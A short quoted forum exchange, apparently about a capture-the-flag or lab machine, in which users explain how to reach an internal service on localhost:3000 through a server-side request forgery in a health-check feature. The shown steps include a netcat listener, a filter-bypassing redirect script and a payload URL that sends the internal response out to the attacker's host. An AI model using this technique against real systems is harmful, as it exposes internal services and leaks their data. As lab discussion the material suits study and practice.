(August 20, 2022, 11:16 PM)unamedstaff04 Wrote: (August 20, 2022, 10:53 PM)Hacker2222 Wrote: (August 20, 2022, 10:46 PM)d3ext Wrote: How do you access the content of the port 3000?
redirect health check to localhost:3000 then payload has html
Can you explain a little better how to do it?
I'm using this method:
Payload URL: http://10.10.xx.xx:4444
nc -lvnp 4444
Monitored URL: http://10.10.xx.xx
To bypass filter: use https://gist.github.com/shreddd/b7991ab491384e3c3331
python2 redirect.py --port 80 --ip 10.10.xx.xx http://127.0.0.1:3000
Under what circumstances...
Always
and get the response json on netcat listener